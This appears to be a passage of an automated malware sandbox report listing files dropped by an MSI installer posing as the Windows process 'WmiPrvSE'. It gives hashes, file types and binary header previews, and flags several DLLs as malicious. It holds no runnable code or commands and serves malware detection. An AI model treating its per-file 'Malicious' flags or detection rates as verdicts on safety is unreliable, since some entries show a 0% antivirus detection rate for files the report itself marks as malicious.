                                        SHA-512:025C88DDD38C61C1E0A96CFFFC6EAB551E633851B3D43F6512ED3B6232EC4FCC98217CB6D524B471269717D7242A8648683DC6557A8C98648BAAA888D0DD837C
                                        Malicious:false
                                        Preview:......................>...................6...........................................................................L.......R.......y...............................................................>...?...@...A...B...C...D...E...F...................................................M...x...........................................................................................................................................................................................................................................................i...u........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9AD54326-34E0-4D44-AFB7-7A7E831CAF55}, Number of Words: 2, Subject: WmiPrvSE, Author: WmiPrvSE, Name of Creating Application: WmiPrvSE (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install WmiPrvSE. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Jul 11 10:40:05 2024, Number of Pages: 200
                                        Category:dropped
                                        Size (bytes):3488768
                                        Entropy (8bit):6.707780137964601
                                        Encrypted:false
                                        SSDEEP:49152:rDjlabwz90h5lmAnAis277zMRH51yB5k+q4E5q8g73SQLWj1s9w4Uf5rXf63h0er:HqwqhLS4776R+XMQyj1s9wP
                                        MD5:616BC662C460329DD73754A96E59277B
                                        SHA1:0131FC44067C83E3EFD8DFE12029E7DF0B44F4A3
                                        SHA-256:29DD2916C20E18B713A8ECB72D3DF632961E818CF35484EC6BAFEDC2FF415680
                                        SHA-512:025C88DDD38C61C1E0A96CFFFC6EAB551E633851B3D43F6512ED3B6232EC4FCC98217CB6D524B471269717D7242A8648683DC6557A8C98648BAAA888D0DD837C
                                        Malicious:false
                                        Preview:......................>...................6...........................................................................L.......R.......y...............................................................>...?...@...A...B...C...D...E...F...................................................M...x...........................................................................................................................................................................................................................................................i...u........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):602432
                                        Entropy (8bit):6.469389454249605
                                        Encrypted:false
                                        SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                        MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                        SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                        SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                        SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: 2024.0198840 298135.msi, Detection: malicious, Browse
                                        • Filename: hForm.0198840 739798.msi, Detection: malicious, Browse
                                        • Filename: ust_019821730-0576383.msi, Detection: malicious, Browse
                                        • Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse
                                        • Filename: RAS_OL321231.msi, Detection: malicious, Browse
                                        • Filename: file.msi, Detection: malicious, Browse
                                        • Filename: file.msi, Detection: malicious, Browse
                                        • Filename: file.msi, Detection: malicious, Browse
                                        • Filename: NFE_098734_br.msi, Detection: malicious, Browse
                                        • Filename: HCUVHNQCS1.exe, Detection: malicious, Browse
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):602432
                                        Entropy (8bit):6.469389454249605
                                        Encrypted:false
                                        SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                        MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                        SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                        SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                        SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):602432
                                        Entropy (8bit):6.469389454249605
                                        Encrypted:false
                                        SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                        MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                        SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                        SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                        SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):602432
                                        Entropy (8bit):6.469389454249605
                                        Encrypted:false
                                        SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                        MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                        SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                        SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                        SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):602432
                                        Entropy (8bit):6.469389454249605
                                        Encrypted:false
                                        SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                        MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                        SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                        SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                        SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):753984
                                        Entropy (8bit):6.461872633696775
                                        Encrypted:false
                                        SSDEEP:12288:sXWV44ngBNmhAzLUhfVdrjpuG1PE0I7+avw4UbY6t5rXf63Rfklet:KWV4zHzLUdVB1n1PE0Yw4Ubz5rXf63hL
                                        MD5:8DD026145833182777A182A646DF81F3
                                        SHA1:4F5CB840193EEA97DF088C83A794FB6E8F67AB07
                                        SHA-256:3071AF6BE43A2611DB45205F0D3F1F25ABA05ACF5F70992FCE2FFFD63EE9C85D
                                        SHA-512:F6C860BF563A24C046A7D76A6BC1E2F6BBFC80A87AC4513DE331049F35198DCBBDBB5BE7F5D49100E1D1C8AB680ECF3EAAA4FDB8F744C9FD5479A1BA64079391
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L....=.d.........."!...$.>..........+........P............................................@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2111
                                        Entropy (8bit):5.76855023326072
                                        Encrypted:false
                                        SSDEEP:48:Grl5GOYyBBWKyUYD8S+DyKeqanAyO79khyFC3:GrjYewAeHqKhyFy
                                        MD5:378EF89297331F646D367D512919AAF1
                                        SHA1:A1D18BCEC09110C179191997EB4788FAFF179FA8
                                        SHA-256:021147B47DBFC6C96391761C5CF3E44251683FC2D845ED3ABFAE6875E5B6FDED
                                        SHA-512:65F18468DA2C806DBA568F852B483F8465A6984690C56E779197A081D83493F3840098E49D3784C11C217B304B8A4961409F425A9D0DF4547F0F267906985CB5
                                        Malicious:false
                                        Preview:...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{4CDF882A-AA01-456F-A2EA-94ABE42E2C47}).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@.......@.....@.....@......&.{B4630925-A1BD-4A8D-9FE5-108126E4BB94}&.02:\Software\WmiPrvSE\WmiPrvSE\Version.@.......@.....@.....@......&.{9C0BC1EA-30AD-4B69-AFF6-894FE3DFA0B2}d.02:\Software\Caphyon\Advanced Installer\Prereqs\{88D74BC3-DFDB-412A-9165-9910293F91BC}\1.0.0\Desktop.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".).C:\Program Files (x86)\WmiPrvSE\WmiPrvSE\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):753984
                                        Entropy (8bit):6.461872633696775
                                        Encrypted:false
                                        SSDEEP:12288:sXWV44ngBNmhAzLUhfVdrjpuG1PE0I7+avw4UbY6t5rXf63Rfklet:KWV4zHzLUdVB1n1PE0Yw4Ubz5rXf63hL
                                        MD5:8DD026145833182777A182A646DF81F3
                                        SHA1:4F5CB840193EEA97DF088C83A794FB6E8F67AB07
                                        SHA-256:3071AF6BE43A2611DB45205F0D3F1F25ABA05ACF5F70992FCE2FFFD63EE9C85D
                                        SHA-512:F6C860BF563A24C046A7D76A6BC1E2F6BBFC80A87AC4513DE331049F35198DCBBDBB5BE7F5D49100E1D1C8AB680ECF3EAAA4FDB8F744C9FD5479A1BA64079391
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......':r.c[.Tc[.Tc[.T.).Un[.T.).U.[.T.%.Ur[.T.%.U{[.T.).Uz[.T.%.U=[.T.).Ub[.T.).Ut[.Tc[.T.Z.Tz$.U([.Tz$.Ub[.Tz$.Tb[.Tc[.Tb[.Tz$.Ub[.TRichc[.T................PE..L....=.d.........."!...$.>..........+........P............................................@.........................`..................h............D..@=.......r.....p............................e..@............P..........@....................text....=.......>.................. ..`.rdata...q...P...r...B..............@..@.data...H(..........................@....rsrc...h...........................@..@.reloc...r.......t..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):519
                                        Entropy (8bit):5.246158296818198
                                        Encrypted:false
                                        SSDEEP:12:EgyTBdudpNK9JQsj//SftEkV3HKszZxSl:6TBdGpNeJRj7ko6xW
                                        MD5:FD54866D02FED2512307CA6893DED1C0
                                        SHA1:A22F2B9116BFEBB03E1A984AC21E727F3BC90181
                                        SHA-256:BE02563F243A140A1291B011FC7EB5BF7A15C526CBB511A9358CDC3F1D19BCF3
                                        SHA-512:F2608558C85E369A2CFA7F6989E9773076B4F95FA4D7BCBD6D94FDCF3A652966A1653288D1A9F95E8CD0F55F7548B3CE13853F76AA463957898E0044BEE7E8BF
                                        Malicious:false
                                        Preview:...@IXOS.@.....@&&.Y.@.....@.....@.....@.....@.....@......&.{88D74BC3-DFDB-412A-9165-9910293F91BC}..WmiPrvSE..1eSOBjseu2.msi.@.....@.....@.....@........&.{9AD54326-34E0-4D44-AFB7-7A7E831CAF55}.....@.....@.....@.....@.......@.....@.....@.......@......WmiPrvSE......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_LaunchChainer....J...AI_LaunchChainer.@....T.C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe...@.....@.....@....
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.164367825876484
                                        Encrypted:false
                                        SSDEEP:12:JSbX72Fjm4/iAGiLIlHVRpZh/7777777777777777777777777vDHF3bit/l0i8Q:Jo46QI5t8iF
                                        MD5:5B5E9E92A577A94C4A256257BE88B4F1
                                        SHA1:610C2232795A2AE8D7EDD4E8C5297B3CB9DC3A83
                                        SHA-256:3D789B45B519ECEB4EA32D1BD4909A538DF69AE1BCDFF956546A99468AE4A8E1
                                        SHA-512:1143487ABCB77DF1F4A47C8FE0F53B1B8025D48F8C19EC93AAF89D7ADDBB1B80DB05284E8E4E62216CB6C98EB0A55A4969C93845E85708E2B101851284886704
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5161050850670992
                                        Encrypted:false
                                        SSDEEP:48:D8Phj7uRc06WXJWnT5RoH8dZSkdXAEkrCym6EdZSkdDck:qhj71tnTPoeWRC82q
                                        MD5:1C4423D880CA1C10C18BA64298517241
                                        SHA1:53F5312D93E15DAB8C6FE617922712E400852D27
                                        SHA-256:8D97F495FC2F19C707323754F8E33E2815B10EDBA42DEE913883B42BCDCD5E0F
                                        SHA-512:8CEA158E638C28ECA04FF558C631715DE166407EEA272C2BD0B8257A47AC4180F5772373FF7C064E365A51DA6CC98033126160EDB33DC6E4C1CF81C0CDC924AE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):360001
                                        Entropy (8bit):5.36296443091826
                                        Encrypted:false
                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaul:zTtbmkExhMJCIpEU
                                        MD5:946EBA3F5104DBE5A4C91D3D1A42E2A2
                                        SHA1:81779754B4C06FD2ECCDB852DF645FF45D932278
                                        SHA-256:EB96B869FC405A1581D563A67AB95AC5AE2419E15EC51AAD053B78522F7362C7
                                        SHA-512:DA7B1B58C142322B6A7C37EEC750816ADC5DA82C7A658133D2F1AAAE42B08625D0A79D580840A8D3BBD8F0FEA198B1159538724D83DDE22467DA7361EF0D6ED2
                                        Malicious:false
                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1236
                                        Entropy (8bit):7.072668199065973
                                        Encrypted:false
                                        SSDEEP:24:+W9AuDaTZSqZkYDbnMmwvPBvMeokvUvr/H2lVZJMC/FN9jcQEYIJ2blcFpmWAUk:+PuDaTZSqZkgJwvPB0eokvUvr/6XJHNn
                                        MD5:18BCACE5E8162ACA8E2EBEEB1F9EDF29
                                        SHA1:F277342A4FFB088AAB959D8CC4B9B3455446B5BE
                                        SHA-256:351D46B240EFEA0A9943D5EE3F67045BB25637AD01E1CF78899E6ACFC19E5229
                                        SHA-512:A3C7DE8D99BC16077D741D2599AD5719C467E9E5F91ABF62D0E6D7D676F01FFDF14E3B6A0D41ABC0BB05D71FA9E55AC4C91CD13A951155064B497E45922E4CC4
                                        Malicious:false
                                        Preview:0...0......0...*.H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 02..240804061727Z..240812063727Z0...0$..3.........81.........240612083143Z02..3.........3........240606103206Z0.0...U.......02..3..i...1.#......i...230216020000Z0.0...U.......02..3..b...L-..B.....b...230118104105Z0.0...U.......02..3........x..........220504165401Z0.0...U.......02..3...?Ml..H.V......?..220331202652Z0.0...U.......02..3.....XS.D.x2........210924182020Z0.0...U.......02..3.....:.]...Z........210715195228Z0.0...U.......02..3......E.RL.........210715195228Z0.0...U........`0^0...U.#..0...$E..w.*|...nd..*.,g0...+.....7.......0...U.......E0...+.....7......240808062727Z0...*.H.............P.......F,f..4...+]./t...1..$.?=s.{....e.8..=.X|....^.W/{y.e.Mt.Wu3.\).......2....p.q..!..%p.c+.p....w...o;.z.c_..%.hs.m...h......`_....,.{T...)E.$8v.r*....s.Z..p..'.=..:Ur=..j..,v...Br..A.c.......\.b.;(%.......p.t:...s[..R.Ag.8o.....t..THc./.X7.f4q,]..\...
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                        Category:dropped
                                        Size (bytes):4770
                                        Entropy (8bit):7.946747821604857
                                        Encrypted:false
                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                        Malicious:false
                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2660
                                        Entropy (8bit):7.57905194369079
                                        Encrypted:false
                                        SSDEEP:48:KitNFpvPI0dLLsh4JuDhJpnurbc29GpTK4pd1mBDRVDVAv5p+Aj5oK09YF00IEp4:D40pYhDhJBurI29gs5pm5IO5oKOgIEp4
                                        MD5:B0CD0CB4163AD978E7E7DCDF50F21270
                                        SHA1:5E3A0C4CCE8B92F3A126CF5350C4C0EFF240A38D
                                        SHA-256:B461B1FF80DB693D6AFF5B0A8ABD45F8591708DB1076AF00081AC577EDAD4B8B
                                        SHA-512:F938946443142E234B98B0759196B75C1A700E70E42832276CD524A31C31E052A10ACD99D80D982875ACFAD64CF64E0B0972E82CE45C1058B974D32B596CE4AE
                                        Malicious:false
                                        Preview:0..`......Y0..U..+.....0.....F0..B0.........e....Iu..n......F..20240801185827Z0v0t0L0...+..............wzb......Z..7...~.j.*......'.P.Oh....3......4.{.............20240619182618Z....20240907194820Z0...*.H.................B.7...aF..K*.'.E..{*....:.^.....*.QK,}..aW.\...j.wY8/...3.P_"!....!..V!...g.... .:.."...b9Jc...F.jN.q.p.~.K...L"Z@B..`..=...A!~.+....(e.T)...W~...y...<1....>..A~.....L..UlE5+...l..D.&.`......m..l...F..,.7.=p....K.$&...w.o...BX....m.Q.c2...../...6.D.h..8.%..e.......c..$...P.$..#1W.Z@6L.....A..GR.~\i.4v...$o..Pv..Y.w......6..n9h.]...H.1.....U.....R.w.)....R..?a...*...W.9.?H.v.....(..:.y.x...).t.Z.!/Z.R.....u..M$/..P.4l.1.".J.....>.A.l.N.....kG.T.5m*.sB.~2..x...+......2.............0...0..~0..f.......3....f.H.I.UH......0...*.H........0w1.0...U....US1.0...U....Microsoft Corporation1H0F..U...?Microsoft Identity Verification Root Certificate Authority 20200...240307194820Z..240907194820Z0..1.0...U....US1.0...U....WA1.0...U....Redmond1.0...U....Mi
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1991
                                        Entropy (8bit):7.519073041703573
                                        Encrypted:false
                                        SSDEEP:48:rBauEPuDaTZYLcrB+VcOcWwK1hwAvw1AjVhOLP7Tf9BjD:42DEZYLMBUcnWx1mmw1OVIzPjD
                                        MD5:CE4E184B2C20FEF2363BE7CAD2482ABA
                                        SHA1:C4D81EE47FDA2695315AC11A3D4DA5B97FC72308
                                        SHA-256:AD680EF955921538CD09A8F11CA38D9BD642343E809207819329E66170BD6099
                                        SHA-512:E1BE5DCAE0926B066ED466C20CDEDD1F9335F5667170B8C23BC8BC9CF694A888C4501E519D84BFA43CDC6E6C4BC3C9574B1133C688BD153C42F80BF6CD2B7071
                                        Malicious:false
                                        Preview:0..........0.....+.....0......0...0.....+..g.N.&~,...........20240802112837Z0..0..0L0...+........44N:...!..It.W$*..~..$E..w.*|...nd..*.,g..3.....G..jv:...........20240802101729Z....20240808155018Z. 0.0...+.....7......240806102729Z0...*.H..............v...B.\.>....::...mc....]..b.W.G...?..57|.1.>.e....=Z.......$.EGy..8".o.)U.w$..y..]1.....61Z.....o.I.<..mz\....|.kW..uh..L.......D.m(_.....}.;v...M......fV.'.mE.....e.^XD...:..{...1.S...vy.0....N.d..m.r*.&A.p..@...mY.|[*g.H.F.0.........O./v........0...0...0..........3..K...R....H....K.0...*.H........0Z1.0...U....US1.0...U....Microsoft Corporation1+0)..U..."Microsoft ID Verified CS AOC CA 020...240801155018Z..240808155018Z0.1.0...U....MSIDAOC02 OCSP Cert0.."0...*.H.............0............6.5....WBi..D.......aYa9. R.....e..........T...V.u........Q..S...?/.] .$e.2R...z.....f_g2....D..Z%...fO.,.r..<K6.,!C...x.V w...V.eXv:@....j.*c_.... ..t'..)&...~\@8x7....~.#..Q.=<X...(.Lg..Q.%....?k,.......@.!0Arke..|..oo-...N&u:.
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2607
                                        Entropy (8bit):7.61013249878447
                                        Encrypted:false
                                        SSDEEP:48:f2aGR8wR3KYLs1TY/QkjOtqi7uDjRpnur5OOxeX5nc1H8mVqDn/cAvJAjDKnEKyW:fFGSCKYw18/NJDjRBur5OOUJW8mVYcmx
                                        MD5:6AB5A494A2C30065D345419DA9C9D81C
                                        SHA1:F0A95FD688510DBFC62EB3AA1F7D1B9C553E55CE
                                        SHA-256:83ADBE14A4AB40ACEDEDC3977155393C3F96CCA2937A0CB9D9F9C2F2BC41C8B4
